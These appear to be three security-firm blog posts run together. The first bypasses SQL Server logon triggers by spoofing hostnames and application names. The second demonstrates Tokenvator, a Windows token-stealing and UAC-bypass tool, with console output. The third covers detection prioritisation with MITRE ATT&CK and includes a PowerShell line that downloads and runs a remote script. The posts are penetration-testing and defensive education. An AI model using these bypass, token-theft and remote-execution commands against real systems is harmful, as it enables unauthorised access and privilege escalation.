It’s pretty common for us to perform application penetration testing against two-tier desktop applications that connect directly to SQL Server databases. Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties. The examples will include SSMS and PowerUpSQL. This should be useful to application penetration testers and developers who may have inherited a legacy desktop application.
This blog has been organized into the sections below, feel free to jump ahead.
A logon trigger is essentially a stored procedure that executes after successfully authenticating to SQL Server, but before the logon session is fully established. They are commonly used to programmatically restrict access to SQL Server based on time of day, hostnames, application names, and number of concurrent sessions by a single user.
Installing SQL Server
If you don’t already have SQL Server installed and want to follow along, below are a few resources to get you started.
Download and install SQL Server Management Studio Express (SSMS) from here.
Creating a Logon Trigger to Restrict Hostnames
Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting workstation name.
Log into your new SQL Server instance as a sysadmin using SSMS.
First, let’s take a look at the name of the workstation connecting to the SQL Server instance using the command below. By default, it should use the hostname of the workstation connecting to the SQL Server instance.
SELECT HOST_NAME()
Create a logon trigger that only allows white listed hostnames to connect. Execute the trigger exactly as it is shown below.
-- Create our logon trigger
CREATE TRIGGER MyHostsOnly
ON ALL SERVER
FOR LOGON
AS
BEGIN
IF
(
-- White list of allowed hostnames are defined here.
HOST_NAME() NOT IN ('ProdBox','QaBox','DevBox','UserBox')
)
BEGIN
RAISERROR('You are not allowed to login from this hostname.', 16, 1);
ROLLBACK;
END
END
After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from a hostname that is not on the white list.
Spoofing Hostnames using SSMS
At this point, you might ask, “when would I (an attacker) actually use this in the real world?”. Usually it’s after you’ve recovered connection strings from configuration files or decompiled code, and now we want to use that information to connect directly to the backend SQL Server. This is a very common scenario during application penetration tests, but we also find internal applications and configuration files on open file shares during network pentests and red team engagements.
Alright, let’s spoof our hostname in SSMS.
Open the “Connect Object Explorer” in SSMS and navigate to options -> “Additional Connection Parameters”. From there you can set connection string properties on the fly (super cool). For the sake of this example, we’ll set the “Workstation ID” property to “DevBox”, which is a hostname we know is white listed. Note: I’ll cover a few ways to identify white listed hostnames later.
Press connect to login. If you open a query window and check your hostname again it should return “DevBox”. This helps further illustrate that we successfully spoofed the hostname.
SELECT HOST_NAME()
Spoofing Hostnames using Connection Strings
Under the hood, SSMS is just building a connection string with our “workstation id” property set. Below is an example of a simple connection string that will connect to a remote SQL Server instance as the current Windows user and select the “Master” database.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
If the logon trigger we showed in the last section was implemented, we should see the “failed to connect” message. However, if you set the “Workstation ID” property to an allowed hostname you would be allowed to log in.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;Workstation ID = DevBox;
Spoofing Hostnames using PowerUpSQL
I’ve also added the “WorkstationId” option to the Get-SQLQuery function of PowerUpSQL. I will be working toward retrofitting the other functions once I find some more time. For now, below is an example showing how to bypass the logon trigger we created in the previous section.
Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
To remove the trigger you can issue the command below.
Get-SQLQuery -Verbose -Instance MSSQLSRV04SQLSERVER2014 -WorkstationId "DevBox" -Query 'DROP TRIGGER MyHostsOnly on all server'
Creating a Logon Trigger to Restrict Applications
Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting application name.
Log into your new SQL Server instance as a sysadmin using SSMS.
First, let’s take a look at the name of the application connecting to the SQL Server instance using the command below. It should return “Microsoft SQL Server Management Studio – Query”.
SELECT APP_NAME()
Create a logon trigger that only allows white listed applications to connect. Execute the trigger exactly as it is shown below.
CREATE TRIGGER MyAppsOnly
ON ALL SERVER
FOR LOGON
AS
BEGIN
IF
(
-- Set the white list of application names here
APP_NAME() NOT IN ('Application1','Application2','SuperApp3000','LegacyApp','DevApp1')
)
BEGIN
RAISERROR('You are not allowed to login from this application name.', 16, 1);
ROLLBACK;
END
END
After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from an application that is not on the white list.
Spoofing Application Names using SSMS
Once again, you might ask, “when would I actually use this in the real world?”. Some applications have their name statically set in the connection string used to connect to the SQL Server. Similar to hostnames, we find them in configurations files and source code. It’s actually pretty rare to see a logon trigger restrict access by application name, but we have seen it a few times.
Alright, let’s spoof our appname in SSMS.
Open the “Connect Object Explorer” in SSMS and navigate to options -> “Additional Connection Parameters”. From there you can set connection string properties on the fly (super cool). For the sake of this example we’ll set the “application name” property to “SuperApp3000”, which is a application name we know is white listed. Note: I’ll cover a few ways to identify white listed application names later.
Press connect to login. If you open a query window and check your application name again it should return “SuperApp3000”. This helps further illustrate that we successfully spoofed the hostname.
SELECT APP_NAME()
Spoofing Application Names using Connection Strings
As I mentioned in the last section, there is a connection string property named “AppName” that can be used by applications to declare their application name to the SQL Server. Below are a few example of accepted formats.
Application Name =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
ApplicationName =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
AppName =MyApp
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
"
Spoofing Application Names using PowerUpSQL
To help illustrate the application name spoofing scenario, I’ve updated the Get-SQLQuery function of PowerUpSQL to include the “appname” option. I will be working toward retrofitting the other functions once I find some more time. Below is a basic example for now.
Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
PowerUpSQL functions wrap .NET SQL Server functions. When connecting to SQL Server programmatically with .NET, the “appname” property is set to “.Net SqlClient Data Provider” by default. However, since we created a new logon trigger that restricts access by “appname” we should get the following error.
Finding White Listed Hostnames and Application Names
If you’re not sure what hostnames and applications are in the logon trigger’s white list, below are a few options for blindly discovering them.
Review the Logon Trigger Source Code
The best way to get a complete list of the hostnames and applications white listed by a logon trigger is to review the source code. However, in most cases this requires privileged access.
SELECT name,
OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
parent_class_desc,
create_date,
modify_date,
is_ms_shipped,
is_disabled
FROM sys.server_triggers
ORDER BY name ASC
Review Application Code for Hardcoded Values
Sometimes the allowed hostnames and applications are hardcoded into the application. If you are dealing with a .NET or Java application, you can decompile and review the source code for keywords related to the connection string they are using. This approach assumes that you have access to application assemblies or configuration files. JD-GUI and DNSPY can come in handy.
Review Application Traffic
Sometimes the allowed hostnames and applications are grabbed from the database server when the application starts. As a result, you can use your favorite sniffer to grab the list. I’ve experienced this a few times. You may ask, why would anyone do this? The world may never know.
Use a List of Domain Systems
If you already have a domain account, you can query Active Directory for a list of domain computers. You can then iterate through the list until you come across one that allows connections. This assumes that the current domain user has the privileges to login to SQL Server and the white listed hostnames are associated with the domain.
Use MITM to Inventory Connections
You can also perform a standard ARP based man-in-the-middle (MITM) attack to intercept connections to the SQL Server from remote systems. If the connection is encrypted (default since SQL Server 2014) you won’t see the traffic, but you’ll still be able to see which hosts are connecting. Naturally other MITM techniques could be used as well.
Warning: If certificate validation is being done this could result in dropped packets and have an impact to a production system, so please use that approach with caution.
General Recommendations
Don’t use logon triggers to restrict access to SQL Server based on information that can be easily changed by the client.
If you wish restrict access to an allowed list of systems, consider using network or host level firewall rules instead of logon triggers.
Consider limiting access to the SQL Server based on user groups and assigned permissions instead of using logon triggers.
Wrap Up
In this blog I covered a few ways to leverage lesser known connection string properties to bypass access restrictions being enforced by SQL Server logon triggers. Hopefully this will be useful if you have to perform a penetration test of a legacy desktop application down the line. If nothing else, hopefully the blog highlighted a few things to avoid when building two-tiered desktop applications. For those who are interested, I’ve also updated the “SQL Server Connection String Cheatsheet” here.
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
WheresMyImplant is a mini red team toolkit that I have been developing over the past year in .NET. While developing and using it, I found that I consistently needed to alter my process access token to do such things as SYSTEM permissions or add debug privileges to my process. The library used for this expanded to the point where it was as useful as an independent toolkit. This is why I created Tokenvator. It is a simple tool I wrote in .NET that can be used to elevate to the appropriate permissions on Windows. It works by impersonating or altering authentication tokens in processes that the executing process has the appropriate level of permissions to.
Tokenvator can be run in an interactive prompt, or commands can be provided as command line arguments. In the interactive mode, base commands will tab complete, with double tabs providing context specific help.
While most of the screenshots will show commands running from an interactive (Tokens) > prompt, it is possible to run all commands as an argument.
Steal_Token
At it’s most basic level, Tokenvator is used to access and manipulate Windows authentication tokens. To appropriate the token of another process, we can run the Steal_Token command with the target process’s PID.
We can also optionally add a command to be run that will be launched with the new access token.
(Tokens) > Steal_Token 7384 powershell.exe
[*] Adjusting Token Privilege
[+] Received luid
[*] AdjustTokenPrivilege
[+] Adjusted Token to: SeDebugPrivilege
[+] Recieved Handle for: (7384)
[+] Process Handle: 860
[+] Primary Token Handle: 864
[+] Duplicate Token Handle: 860
[*] CreateProcessWithTokenW
[+] Created process: 14524
[+] Created thread: 18784
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:WINDOWSsystem32> whoami
labbackup
PS C:WINDOWSsystem32> $pid
14524
GetSystem
The most common token I need to steal is for the NT AUTHORITYSYSTEM account. The GetSystem command was created as a wrapper for Steal_Token to automatically find and access SYSTEM tokens. It works with the same syntax as Steal_Token. Note: This needs to be run from an elevated context.
(Tokens) > GetSystem
[*] Adjusting Token Privilege
[+] Received luid
[*] AdjustTokenPrivilege
[+] Adjusted Token to: SeDebugPrivilege
[*] Searching for NT AUTHORITYSYSTEM
[*] Examining 344 processes
[*] Discovered 118 processes
[*] Impersonating 5488
[+] Recieved Handle for: (5488)
[+] Process Handle: 888
[*] Impersonating 4444
[+] Recieved Handle for: (4444)
[+] Process Handle: 868
[+] Primary Token Handle: 904
[+] Duplicate Token Handle: 868
(Tokens) > WhoAmI
[*] Operating as NT AUTHORITYSYSTEM
(Tokens) > RevertToSelf
[*] Reverted token to labbadjuju
I’ve discovered that I am unable to directly access the token of certain processes unless I’ve first elevated to SYSTEM. Examples of the are the NT SERVICE accounts such as a local SQL service process. This might be necessary if the local SYSTEM account doesn’t have SYSADMIN privileges on the database. Scott Sutherland talks more about this in this blog.
GetTrustedInstaller
It is common for the files in the SYSTEM32 folder or parts of the registry to be owned by the TRUSTEDINSTALLER group. To manipulate the contents of these locations, we can either take ownership or get an access token that has membership in the TRUSTEDINSTALLER group. Similar to GetSystem, GetTrustedInstaller is a wrapper for Steal_Token that starts the TrustedInstaller service and appropriates it’s token.
List_Privileges and Set_Privilege
Sometimes our process doesn’t have the particular access right that we need in order to complete a task. For instance, to access a process that your current user doesn’t own, the SeDebugPrivilege is required. Shown below is a split token in a high integrity process (UAC Elevated – TokenElevationTypeFull)
And here we can see the default privileges assigned to a split token in a medium integrity process (UAC Not Elevated – TokenElevationTypeLimited)
For this functionality, we are not limited to just our own process Let’s examine what notepad.exe’s token looks like when run as administrator. Note: To access a process not owned by your current user, the SeDebugPrivilege must be enabled on your current process.
Having examined notepad.exe’s token, we can remotely alter the privileges on it. Let’s add SeLoadDriverPrivilege to that token and see what happens. Note: Privilege names are case sensitive.
Sure enough, notepad.exe can now load a driver, for whatever interesting use case that might require that. In the future the ability to remove privileges will be added.
BypassUAC
UAC bypasses have become plentiful that this point, however one of the more interesting ones comes from manipulating tokens. FuzzySecurity has done some very interesting work on a UAC bypass method utilizing Windows tokens. Tokenvator includes an implementation of the technique he published. Below, our unprivileged token can be used to access an elevated process our current user owns and spawn an elevated shell.
While this method likely will not be patched in the near future, it is not without its limitations. As can be seen below, while the process is high integrity, the privileges assigned to the token are still limited.
Finding User Processes
For finding a user on a system there are multiple methods for identification. Firstly, we can look at registered session on the system.
One feature that I’ve wanted is the ability to have a summary view of user processes to get a sample of users and a process that they own. This is what the List_Processes command accomplishes.
(Tokens) > List_Processes
User Process ID Process Name
---- ---------- ------------
labbadjuju 4000 conhost
List_Processes takes advantage of the native API’s on the host and is quite fast at listing a summary of processes and owners. As of now, it will not be able to function properly unless run from an elevated context. Because of this, List_Processes_WMI has been included. As the name might imply, this operates via WMI. While not as quick as List_Processes, it can provide a more thorough view from a non-elevated context.
(Tokens) > List_Processes_WMI
[*] Examining 102 processes
User Process ID Process Name
---- ---------- ------------
0 Idle
LABBADJUJU 448 taskhost
LOCAL XBADJUJU 1568 cmd
Or we can poll the system for for all processes running under the context of a particular user. Note: as of the initial release, the full username is required.
Similarly to List_Processes a mechanism to accomplish the same task has been included via WMI. This will also work in an unelevated context.
(Tokens) > Find_User_Processes_WMI LOCAL xBADJUJU
[*] Examining 102 processes
[*] Discovered 31 processes
Process ID Process Name
---------- ------------
1568 cmd.exe
2108 conhost.exe
1936 procexp64.exe
3544 cmd.exe
3608 conhost.exe
3892 x64dbg.exe
I made this program for myself and the NetSPI team, but hopefully it will be useful to others. If you have any bugs, commits, or feature requests let me know. All are welcome.
As Adversarial Simulation continues to gain momentum, more companies are performing full evaluations of their technical detective control capabilities using tools like the Mitre ATT&CK Framework. While this is a great way for internal security teams to start developing a detective control baseline, even mature organizations find themselves with dozens of detective capability gaps to follow up on. So, the natural question we hear from clients is “What is the best way to prioritize and streamline our remediation efforts?”. In this blog I’ll provide a few tips based on my experiences.
Before I go down that road, I wanted to take a moment to touch on how I’m qualifying adversarial simulation in this context. Feel free to SKIP AHEAD to the actual tips.
Adversarial Simulation
To better answer the questions, “What are attackers doing?” and “What should we be looking for?”, internal security teams started to document what techniques were being used by malware, red teams, and penetration testers at each phase of the Cyber Kill Chain. This inventory of techniques could then be used to baseline detection capabilities. As time went on, projects like the Mitre ATT&CK Framework started to gain more favor with both the red and the blue teams.
Out of this shared adoption of an established and public framework, Adversarial Simulation began to grow in popularity. Similar to the term “red team”, “Adversarial Simulation” can mean different things to different people. In this context, I’m defining it as “Measuring the effectiveness of existing technical detective controls using a predefined collection of security unit tests”. The goal of this type of testing is to measure the company’s ability to identify known Tools Techniques and Procedures (TTPs) related to the behavior of attackers that have already obtained access to the environment in an effort to build/maintain a detective control baseline.
After conducting multiple Adversarial Simulation exercises with small, medium, and large organizations, one thing became very apparent. If your company hasn’t performed adversarial simulation testing before, then you’re likely to have a quite a few gaps at each phase of the cyber kill chain. At first this can seem overwhelming, but it is something that you can triage, prioritize, and manage.
The rest of this blog covers some triage options for those companies going through that now.
Using MITRE ATT&CK as a Measuring Stick
The MITRE ATT&CK framework defines categories and techniques that focus on post-exploitation behavior. Since the goal is to detect that type of behavior it offers a nice starting point.
Source: https://attack.mitre.org/
While this is a good place to start measuring your detective and preventative controls, it’s just a starting point. ATT&CK doesn’t cover a lot of technologies commonly found in enterprise environments, and not all the techniques covered will be applicable to your environment.
Many of the internal security teams we work with have started adopting the ATT&CK framework to some degree. The most common process we see them using has been outlined below:
Start with the entire framework
Remove techniques that are not applicable to your environment
Add techniques that are specific to technologies in your environment
Add techniques that are not covered, but are well known
Work through one category at a time
Test one technique at a time
Assess the SOC team’s ability to detect the technique
Identify artifacts, identify data sources used for TTP discovery, and create SIEM rules
Document technique coverage
Rinse, lather, and repeat.
While there are some commercial products and services available to support this process we have also seen some great open source projects. The Threat Hunter Playbook created by Roberto Rodriguez is at the top of my recommended reading list. It includes lots of useful tools to help internal teams get rolling. You can find it on github: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
When we work with clients, we typically measure the applicable techniques in all phases to provide insight into their ability to detect them within each of the post-exploitation attack phases defined in the ATT&CK framework. However, sometimes that can be information overload so starting with a few key categories of techniques can be a nice way to kick things off. Clients usually prefer to prioritize around execution, defense evasion, and exfiltration, because they essentially represent the beginning and end of a basic attack workflow. Also, when evaluating exfiltration techniques, you implicitly cover some the more common controls channels.
Below is a sample of the summary data that can shake loose when looking at the whole picture.
At first glance this can seem alarming, but the sky is not falling. Keep in mind that the technologies and processes to identify the TTPs for post exploitation are still trying to catch up to attackers. The first step to getting better is being honest about what you can and can’t do. That way you’ll have the information you need to create a prioritized roadmap that can give you more coverage in a shorter period of time for less money (hopefully).
Remediation Prioritization Tips
The goal of these tips is to reduce the time/dollar investment required to improve the effectiveness of the current controls and your overall ability to detect known and potential TTPs. To start us off I wanted to note that you can’t alert on the information you don’t have. As a result, missing data sources often map directly to missing alerts in specific categories.
Prioritizing Data Sources
As I mentioned before, data sources are what fuel your detective capabilities. When choosing to build out a new data source or detective capability, consider prioritizing around those that have the potential to cover the highest number of techniques across all ATT&CK framework categories.
For example, netflow data can be used identify:
Generic scanning activity
Authenticated scanning
ICMP and DNS tunnels
Large file downloads and uploads
Long login sessions
Reverse shell patterns
Failed egress attempts
I’m sure there are more use cases, but you get the idea. Naturally, you should inventory and track your known data sources and be conscious of what your data source gaps are. One way to help make sure that gap list is fleshed out is to identify potential data sources based on what techniques don’t generate any alerts.
Below is a basic pie chart showing how that type of data can be represented. It summarizes the level of visibility for techniques that did not generate a security alert. The identified detection gaps fall into 1 of 5 detection levels. Unknown, Undetected, Partially Logged, Logged, and Partially Detected.
Existing Data Sources
From this we can see that 60% of the techniques that didn’t generate an alert still left traces in logs. By pulling in that log data we can almost immediately start working on correlations and alerts for many of the associated attack techniques. That by itself should have some influence on what you start with when building out new detections.
Missing Data Sources
The other 40% represent missing or misconfigured data sources. Using the list of associated techniques and information from Mitre we can determine potential data sources, and which ones would provide coverage for the largest number of techniques. If you’re not sure what data sources are associated with which techniques, you can find it on Mitre website. Below is an example that illustrates some of the information available for the Accessibility Features in Windows.
Below is a sample PowerShell script the uses Invoke-ATTACKAPI to get a list of the data sources that can be used to identify multiple attack techniques. To increase its usefulness, you could easily modify it to only include the attack techniques that you know your blind to. Note: All of your data sources may not be covered by the framework, or they may use different language to describe them.
From the command results, you can quickly see that “Process Monitoring” and a few others can be incredibility powerful data sources for detecting the techniques in the Mitre ATT&CK Framework.
Prioritizing Techniques by Tactic
Command execution and defense evasion techniques occur at the beginning, and throughout the kill chain. As such, having deeper visibility into these techniques can help mitigate risk associated with some of the visibility gaps in later attack phases; such as persistence, lateral movement, and credentials gathering by detecting potentially malicious behavior sooner.
Below I reorganized the ATT&CK categories from our previous example test results to illustrate the point.
Command Execution
Attackers often employ non-standard command execution techniques that leverage native applications to avoid application white list controls. Many of those techniques are not commonly used by legitimate users, so the commands themselves can be used as reliable indicators of malicious behavior.
For example, most users don’t use regsvr32.exe, regsvcs.exe, or msbuild.exe at all. When they are used legitimately, it’s rare that they use the same command options as attackers. For some practical examples check out the atomic-red-team repo on github: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md
Defense Evasion
Similar to command execution, attackers often employ defense evasion techniques that do not represent common user behavior. As a result, they can be used as reliable indicators of malicious behavior.
Lateral Movement
Not every attacker performs scanning, but a lot of them do. If you can accurately identify generic scanning and authenticated scanning behavior through netflow data and Windows authentication logs you have a pretty good chance of detecting them. If you have the data sources, but alerts aren’t configured, it’s worth the effort to close the gap. Sean Metcalf shared a presentation that covers some information on the topic (among other things) that can be found here.
Ideally it will help you identify potentially malicious movement before the attackers reach their target and start exfiltration.
Exfiltration
If you missed the attacker executing commands on the endpoints, looking for common malicious behaviors and anomalies in outbound traffic and internet facing systems can yield some valuable results (assuming you have the right data sources). Most people are familiar with the common controls channels, but for those who are not, below is a short list:
ICMP, SMTP, SSH, and DNS tunnels
TCP/UDP reverse shells (over various ports/protocols)
TCP/UDP beacons (over various ports/protocols)
Web shells
Prioritizing Techniques by Utility
Developing detections for techniques that are used in multiple attack phases can give you a better return on your time/dollar investments. For example, scheduled tasks can be used for execution, persistence, privilege escalation, and lateral movement. So, when you have the ability to identify high risk tasks that are being created, you can kill three birds with one stone. (Note: No birds were actually killed in the making of this blog.)
Below is a sample PowerShell script the uses Invoke-ATTACKAPI to get a list of the techniques used in multiple attack categories. To increase its usefulness, you could easily modify it to only include the attack techniques that your blind to.
Once again you can see that some of the techniques can be used in more phases than others.
Prioritizing Techniques by (APT) Group
The ATT&CK framework also includes information related to well-known APT groups and campaigns at https://attack.mitre.org/wiki/Groups. The groups are linked to techniques that were used during campaigns. As a result, we can see what techniques are used by the largest number of (APT) groups using the Invoke-ATTACKAPI Powershell script below.
#Load script from github and sync
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1
#Techniques used by largest number of APT groups
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select Group,TechniqueName -Unique |
Where group -notlike "" | Group-Object TechniqueName | Sort-Object count -Descending
To make it more useful, filter for group names that are more relevant to your industry. At the moment I don’t think the industries or countries targeted by the groups are available as meta data in the ATT&CK framework. So for now that part may be a manual process. Either way, big thanks to Jimi for the tip!
Prioritizing Based on Internal Policies and Requirements
Understanding your company’s priorities and policies should always influence your choices. However, if you are going to follow those policies, make sure that the language is well defined and understood. For example, if you have an internal policy that states you must be able to detect all known threats, then “known threats” needs to be defined and expectations should be set as to how the list of known threats will be maintained.
Like vulnerability severity ranking, you should also create a system for ranking detective control gaps. That system should also define how quickly the company will be required to develop a detective capability either through existing controls, new controls, or process improvements.
Bridging the Gap with Regular Hunting Exercises
Regardless of how you prioritize the development of your detective capabilities, things take time. Collecting new data sources, improving logging, improving SIEM data ingestion/rules for all of your gaps is rarely a quick process. While you’re building out that automation consider keeping an eye on known gaps via regular hunting exercises. We’ve seen a number of clients leverage well defined hunts to yield pretty solid results. There was a nice presentation by Jared Atkinson and a recent paper by Paul Ewing/Devon Kerr from Endgame that are worth checking out if you need a jump start.
Wrap Up
Just like preventative controls, there is no such thing as 100% threat detection. Tools, techniques, and procedures are constantly changing and evolving. Do the best you can with what you have. You’ll have to make choices based on perceived risks and the ROI of your security control investments in the context of your company, but hopefully this blog with help make some of the choices easier. At the end of the day, all of my recommendations and observations are limited to my experiences and the companies I’ve worked with in the past. So please understand that while I’ve worked with quite a few security teams, I still suffer from biases like everyone else. If you have other thoughts or recommendations, I would love to hear them. Feel free to reach out in the comments. Thanks and good luck!
Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.
Name
Domain
Purpose
Expiry
Type
YSC
youtube.com
YouTube session cookie.
52 years
HTTP
Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.
Name
Domain
Purpose
Expiry
Type
VISITOR_INFO1_LIVE
youtube.com
YouTube cookie.
6 months
HTTP
Analytics cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.
We do not use cookies of this type.
Preference cookies enable a website to remember information that changes the way the website behaves or looks, like your preferred language or the region that you are in.
We do not use cookies of this type.
Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
We do not use cookies of this type.
Cookies are small text files that can be used by websites to make a user's experience more efficient. The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission. This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.